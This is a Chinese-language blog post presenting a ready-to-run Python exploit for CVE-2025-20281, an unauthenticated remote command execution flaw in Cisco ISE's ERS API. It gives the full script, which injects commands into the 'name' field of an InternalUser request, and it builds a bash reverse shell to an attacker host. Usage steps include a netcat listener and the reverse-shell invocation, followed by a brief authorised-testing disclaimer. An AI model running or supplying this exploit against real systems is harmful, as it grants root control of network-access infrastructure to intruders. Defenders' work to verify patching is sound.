CVE-2025-20281 漏洞概念验证(PoC)脚本:针对Cisco ISE的未授权远程代码执行漏洞

qife122
6 阅读4分钟

CVE-2025-20281 - Cisco ISE 未授权远程代码执行漏洞利用脚本

项目标题与描述

这是一个针对关键漏洞 CVE-2025-20281 的Python概念验证(PoC)脚本。该漏洞存在于Cisco身份服务引擎(ISE)ISE被动身份连接器(ISE‑PIC) 中,允许攻击者在无需任何身份验证的情况下,通过特定API端点注入并执行任意命令,并获得系统的root权限。脚本旨在帮助安全研究人员和防御者验证其系统是否已正确修复此漏洞。

功能特性

  • 无需身份验证的利用:直接向目标ISE系统的ERS API发送恶意请求,无需提供任何凭据。
  • 灵活的命令执行
    • 支持执行简单的系统命令(如 whoami)来验证漏洞存在性。
    • 支持生成反向Shell连接,用于进一步的交互式访问。
  • 易于使用:提供清晰的命令行参数,便于指定目标系统和要执行的攻击载荷。
  • 绕过证书验证:默认禁用SSL证书验证,便于在测试环境中使用自签名证书。
  • 关键漏洞演示:针对CVSS评分高达9.8的关键远程代码执行漏洞进行概念验证。

安装指南

系统要求

  • Python 3.6 或更高版本。
  • 操作系统:Windows, Linux 或 macOS。

依赖安装

脚本运行依赖于 requestsurllib3 库。请使用以下命令安装:

pip install requests urllib3

获取脚本

  1. 将提供的Python脚本内容保存为文件,例如 CVE-2025-20281_poc.py
  2. 确保脚本具有可执行权限(Linux/macOS): 
    chmod +x CVE-2025-20281_poc.py

使用说明

基本用法

脚本通过命令行参数运行。主要参数如下:

  • target:目标Cisco ISE的IP地址或主机名(必需)。
  • --whoami:执行 whoami 命令来验证当前用户权限。
  • --reverse LHOST LPORT:生成一个反向Shell连接到指定的监听主机(LHOST)和端口(LPORT)。

示例

  1. 测试漏洞是否存在(执行 whoami 命令):

    python CVE-2025-20281_poc.py 192.168.1.100 --whoami

    如果目标存在漏洞,将返回执行命令的用户(预期为 root),并显示HTTP响应。

  2. 建立反向Shell连接: 首先,在攻击机上使用 netcat 监听一个端口:

    nc -lvnp 4444

    然后运行脚本,指定攻击机的IP和监听端口:

    python CVE-2025-20281_poc.py 192.168.1.100 --reverse 10.0.0.5 4444

    如果成功,将在监听端获得一个反向Shell。

注意事项

  • 此脚本仅用于授权的安全测试教育研究
  • 请务必在获得明确书面授权后,在您拥有或控制的系统上使用。
  • 在实际环境中,滥用此脚本可能导致严重的法律后果。

核心代码

以下是此PoC脚本的核心代码及其详细注释:

#!/usr/bin/env python3
import requests
import urllib3
import argparse

# 禁用自签名证书的警告信息,避免在测试环境中输出过多干扰信息
urllib3.disable_warnings()

def exploit_cve_2025_20281_unauth(target, cmd):
    """
    核心漏洞利用函数。
    构造一个无需认证的POST请求发送至Cisco ISE的ERS API,
    并将待执行的命令注入到'name'字段中,从而实现远程代码执行。
    
    参数:
        target (str): 目标ISE系统的地址。
        cmd (str): 要注入并执行的系统命令。
    """
    # 构造目标API URL。漏洞存在于端口9060的 `/ers/sdk#_` 端点
    url = f"https://{target}:9060/ers/sdk#_"
    # 也可以使用备用注释行,如果默认端口被重定向或修改
    #url = f"https://{target}/ers/sdk#_"
    
    # 构造恶意载荷。关键是将命令注入到'InternalUser'对象的'name'属性中。
    # 使用 `;` 分隔命令,并使用 `#` 注释掉可能存在的后续内容,以确保命令被正确执行。
    payload = {
        "InternalUser": {
            "name": f"pwn; {cmd}; #",  # 命令注入点
            "password": "x",            # 虚拟密码,漏洞利用中会被忽略
            "changePassword": False
        }
    }
    # 发送POST请求,verify=False 表示忽略SSL证书验证。
    # 注意:请求中未包含任何身份验证凭据。
    r = requests.post(url, json=payload, verify=False)
    print(f"[+] HTTP {r.status_code}\n{r.text}\n")

def build_reverse_shell(lhost, lport):
    """
    生成一个标准的bash反向Shell命令字符串。
    
    参数:
        lhost (str): 监听主机的IP地址。
        lport (str): 监听主机的端口号。
        
    返回:
        str: 构建好的反向Shell命令。
    """
    return f"/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"

if __name__ == '__main__':
    # 设置命令行参数解析器,提供清晰的帮助信息
    parser = argparse.ArgumentParser(
        description="Unauthenticated PoC for CVE-2025-20281 on Cisco ISE ERS"
    )
    parser.add_argument('target', help="IP or hostname of the ISE PAN")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument(
        '--whoami',
        action='store_true',
        help="Run 'whoami' and print the result"
    )
    group.add_argument(
        '--reverse',
        nargs=2,
        metavar=('LHOST', 'LPORT'),
        help="Spawn a bash reverse shell to LHOST:LPORT"
    )

    args = parser.parse_args()

    # 根据命令行参数选择执行模式
    if args.whoami:
        cmd = 'whoami'  # 简单验证命令
    else:
        lhost, lport = args.reverse
        cmd = build_reverse_shell(lhost, lport)  # 构建反向Shell命令

    print(f"[*] Target: {args.target}")
    print(f"[*] Command: {cmd}\n")
    # 调用核心漏洞利用函数
    exploit_cve_2025_20281_unauth(args.target, cmd)

6HFtX5dABrKlqXeO5PUv/84SoIo+TE3firf/5vX8AZ4mq9abg3UjjJJklkSrXfPg

avatar
文章
阅读
粉丝